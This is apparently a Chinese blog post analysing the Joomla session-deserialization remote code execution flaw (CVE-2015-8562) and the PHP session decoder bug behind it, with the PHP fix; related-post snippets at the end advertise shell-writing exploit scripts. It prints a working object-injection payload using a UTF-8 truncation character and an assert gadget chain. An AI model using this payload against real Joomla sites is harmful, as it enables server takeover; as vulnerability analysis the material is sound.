php+反序列化代码执行漏洞,session反序列化代码执行漏洞分析[Joomla RCE]

最新推荐文章于 2023-07-10 18:04:46 发布
最新推荐文章于 2023-07-10 18:04:46 发布
阅读量221 收藏
点赞数
文章标签: php+反序列化代码执行漏洞

83120

Author:L.N.@360adlab

0x01 漏洞影响版本

PHP < 5.6.13

0x02 joomla利用程序分析

joomla具体漏洞分析请看phith0n牛分析文章,本文只讨论此漏洞的核心问题所在。

利用程序poc:

}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}�

注意poc中的ð���截断字符,此处是关键,当我们把此poc注入到数据库以后所形成的数据为:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450174018;s:18:"session.timer.last";i:1450174018;s:17:"session.timer.now";i:1450174018;s:22:"session.client.browser";s:412:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}

此时截断字符消失。

通过分析php底层实现代码:

#define PS_DELIMITER '|'

#define PS_UNDEF_MARKER '!'

PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */

{

const char *p, *q;

char *name;

const char *endptr = val + vallen;

zval *current;

int namelen;

int has_value;

php_unserialize_data_t var_hash;

PHP_VAR_UNSERIALIZE_INIT(var_hash);

p = val;

while (p 

zval **tmp;

q = p;

while (*q != PS_DELIMITER) {

if (++q >= endptr) goto break_outer_loop;

}

if (p[0] == PS_UNDEF_MARKER) {

p++;

has_value = 0;

} else {

has_value = 1;

}

namelen = q - p;

name = estrndup(p, namelen);

q++;

if (zend_hash_find(&EG(symbol_table), name, namelen + 1, (void **) &tmp) == SUCCESS) {

if ((Z_TYPE_PP(tmp) == IS_ARRAY && Z_ARRVAL_PP(tmp) == &EG(symbol_table)) || *tmp == PS(http_session_vars)) {

goto skip;

}

}

if (has_value) {

ALLOC_INIT_ZVAL(current);

if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC)) {

php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);

}

zval_ptr_dtor(&current);

}

PS_ADD_VARL(name, namelen);

skip:

efree(name);

p = q;

}

break_outer_loop:

PHP_VAR_UNSERIALIZE_DESTROY(var_hash);

return SUCCESS;

}

代码中通过指针移动判断"|"的位置,获取"|"前面部分为session键名,然后通过php_var_unserialize函数反序列化"|"后面部门,如果解析成功则把值写入session,如果解析失败则销毁当变量,然后继续移动指针判断"|",如果"|"存在,继续把"|"前数据作为变量,解析"|"后面的值。

结合joomla漏洞:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450174018;s:18:"session.timer.last";i:1450174018;s:17:"session.timer.now";i:1450174018;s:22:"session.client.browser"

;s:412:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}

当php解析此段数据的时候,首先获取到"|"前面的数据"__default"为session的键名,然后"|"后面的数据进入反序列化流程php_var_unserialize,反序列化流程的底层关键代码如下:

size_t len, maxlen;

char *str;

len = parse_uiv(start + 2);

maxlen = max - YYCURSOR;

if (maxlen 

*p = start + 2;

return 0;

}

指针依次移动反序列化数据,当解析到如下数据的时候:

······s:412:"}__test|O:21:"JData······

数据经过上面关键代码:

len = parse_uiv(start + 2);通过parase_uiv获取412这个值给len;

maxlen = max – YYCURSOR;获取当前指针以后数据的长度,YYCURSOR当前指针指向},即获取的是}_test……的数据长度为408

少了4个字符,这少的4个字符为我们的截断字符。

这样,此时if判断成功,进入内部语句,使得反序列化失败返回0,而我们的指针p指向"4".

if (maxlen 

*p = start + 2;

return 0;

}

php_var_unserialize返回0,

if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC)) {

php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);

}

zval_ptr_dtor(&current);

efree(name);

p = q;

注销当前变量,p = q;进入下一个循环,继续寻找"|",由于我们的p目前指向的是"4",所以session键名为412:"}__test,"|"后面数据正常反序列化,

最后经过session反序列化joomla的poc后代码执行:

'412:"}__test' =>object(JDatabaseDriverMysqli)[30]

public 'name' => string 'mysqli' (length=6)protected 'nameQuote' => string '`' (length=1)protected 'nullDate' => string '0000-00-00 00:00:00' (length=19)private '_database' (JDatabaseDriver) => nullprotected 'connection' => boolean trueprotected 'count' => int 0protected 'cursor' => nullprotected 'debug' => boolean falseprotected 'limit' => int 0protected 'log' =>array (size=0)emptyprotected 'timings' =>array (size=0)emptyprotected 'callStacks' =>array (size=0)emptyprotected 'offset' => int 0protected 'options' => nullprotected 'sql' => nullprotected 'tablePrefix' => nullprotected 'utf' => boolean trueprotected 'errorNum' => int 0protected 'errorMsg' => nullprotected 'transactionDepth' => int 0protected 'disconnectHandlers' =>array (size=1)

0 =>array (size=2)

...

public 'fc' =>object(JSimplepieFactory)[31]

0x03 php>=5.6.13版本修复

在php>=5.6.13版本中修复此问题,5.6.13版本以前是第一个变量解析错误注销第一个变量,然后解析第二个变量,但是5.6.13以后如果第一个变量错误,直接销毁整个session。

ALLOC_INIT_ZVAL(current);

if (php_var_unserialize(&current, (const unsigned char **) &q, (const unsigned char *) endptr, &var_hash TSRMLS_CC)) {

php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);

} else {

var_push_dtor_no_addref(&var_hash, &current);

efree(name);

PHP_VAR_UNSERIALIZE_DESTROY(var_hash);

return FAILURE;

}

var_push_dtor_no_addref(&var_hash, &current);

感谢@ryat师傅的指导。

另一篇技术分析:

微基因WeGene
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化漏洞利用工具(joomla
01-01
Java反序列化漏洞利用工具(joomla版本)亲测可用,直接GETSHELL以及执行命令没问题
Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)
weixin_33881753的博客
02-16 504
Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote code executionimport urllib2import cookielib,syscj = cookielib.CookieJar()opener = urllib2.build_open...
Joomla反序列化漏洞
Kevin's Blog
01-18 661
文章目录一、介绍1.1 漏洞原理1.2 影响版本二、漏洞复现2.1 配置环境2.2 漏洞复现三、防御措施 一、介绍 1.1 漏洞原理   PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomlasession存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。 1.2 影响版本 joomla<3.4.6 PHP 5.6 <5.6
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
EC_Carrot的博客
07-06 465
漏洞详细 具体参考:https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html 影响范围 Joomla 1.5.x, 2.x, and 3.x before 3.4.6 PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45 漏洞复现 不知为何环境开不起来,但是过程讲讲 先不带User-Agent头,访问一下主页
joomla漏洞利用代码
12-29
joomla漏洞利用代码,影响版本joomla1.5-3.4.最开始检测到利用该漏洞实施入侵的是 Securi 安全团队
joomla代码分析
10-11
**Joomla代码分析** Joomla是一款非常流行的开源内容管理系统(CMS),它允许用户轻松地创建、管理和维护网站,而无需深入编程知识。Joomla的核心优势在于其灵活性和可扩展性,这使得它成为开发者进行二次开发的...
Joomla 框架 虚拟机+ 代码
07-06
是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matters(见扩展阅读)这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地...
joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞...
weixin_30266829的博客
12-16 194
catalog 1. 漏洞描述 2. PHP SESSION持久化 3. PHP 序列化/反序列化内核实现 4. 漏洞代码分析 5. POC构造技巧 6. 防御方案 7. Code Pathc方案 1. 漏洞描述 Joomla在处理SESSION序列化数据的时候,对序列化格式未进行严格规范,导致攻击者可以构造畸形HTTP包,实现对象注入 Relevant Link...
Joomla 3.4.5 反序列化漏洞 CVE-2015-8562 漏洞复现
ADummy的博客
03-03 541
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562) by ADummy 0x00利用路线 ​ burpsuite抓包改包—>命令执行 0x01漏洞介绍 ​ 本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomlasession存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。通过Joomla中的
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 855
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码执行恶意构造的.
JDBC连接Mysql数据库详解
最新发布
2301_77478553的博客
07-10 8249
今天讲述了如何在jdbc连接mysql数据库详解,可以对数据进行基本操作,但是由于代码比较多,我们要实现封装代码的功能,让我们的代码看上去更加清晰明了,高大上,并且同时实现查询一条数据和多条数据的功能,还需要更多的努力。明天会具体探究JDBC连接后mysql的增删改查数据的操作,会牵扯到反射,多态,封装,SSM框架等知识点的学习,有兴趣的可以等待一下,明天准时发布!因为JDBC是通过接口来调用方法的,当你导入了驱动jar包(实现类)后,那调用的方法肯定是实现类里面的方法。
python代码执行漏洞_【转载】Joomla远程代码执行漏洞分析
weixin_29625757的博客
02-03 236
利用脚本。exp:python jj.py http://123.123.123.123 ->直接GETSHELLpython jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90secimporturllib2,urllib,base64importcookielib,sys,recj=coo...
joomla对象注入漏洞分析
weixin_34138377的博客
08-09 436
0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞漏洞利用无须登录,直接在前台就可以运行随意PHP代码Joomla 安全团队紧急公布了 Joomla 3.4.6 版本号,修复了这个高危 0day 漏洞。   0x01 漏洞原理 漏洞存在于反序列化session的过程中。我们能够控制session的值。并且没有过滤...
joomla 1.5-3.4 Remote Code Execution (exp)
乐枕的家
12-17 1558
poc#!/usr/bin/python # coding=utf-8 import urllib2 import cookielib import sys """ python joomla.py http://example.com/ """cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookiePro
database driver 配置mysql_MyEclipse下JDBC-MySQL配置总结
weixin_29797343的博客
02-01 533
原创文章,转载请注明:MyEclipse下JDBC-MySQL配置总结By Lucio.Yang新手,初期配置未成功,后将网上的方法几乎全部尝试才弄好,下面的方法全而不简练,希望高手指正。1.JDBC-mysql配置要在MyEclipse下使用Hibernate,需要先配置好JDBC和MyEclipse数据库连接1.1资源准备mysql版本:5.0.45-community-nt(wamp5)...
MySQL登录时出现Access denied for user ‘root‘@‘localhost‘ (using password: YES)无法打开的解决方法
热门推荐
JMFive的博客
07-02 81万+
在学习数据库的过程中,总有些奇奇怪怪的问题出现,比如前两天用得好好的,当天一用就崩,真的被崩的一脸懵逼。只能上百度搜索解决方法,百度了好几天,发现很多方法都不怎么适用,有些只能用一半,所以索性自己就总结出那些有用的,前人种树后人乘凉嘛,偶尔当一下前人也是不错的 🍉 🍉 🍉。只希望减少大家搜索时间,比较时间就是金钱 👍 👍 👍。如果文章有什么需要改进的地方还请大佬不吝赐教。👏 👏 👏🌹 🌹 🌹也欢迎你,关注我。👍 👍 👍!!
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4092
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
Joomla PHP内容管理系统快速建站教程
Joomla的模板系统允许用户自定义网站的外观,通过更换或编辑模板CSS和HTML代码,实现网站视觉风格的个性化。 在文档中,可能会涵盖如何安装和设置Joomla、创建基本页面、安装和管理扩展、设置权限、以及进行SEO优化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值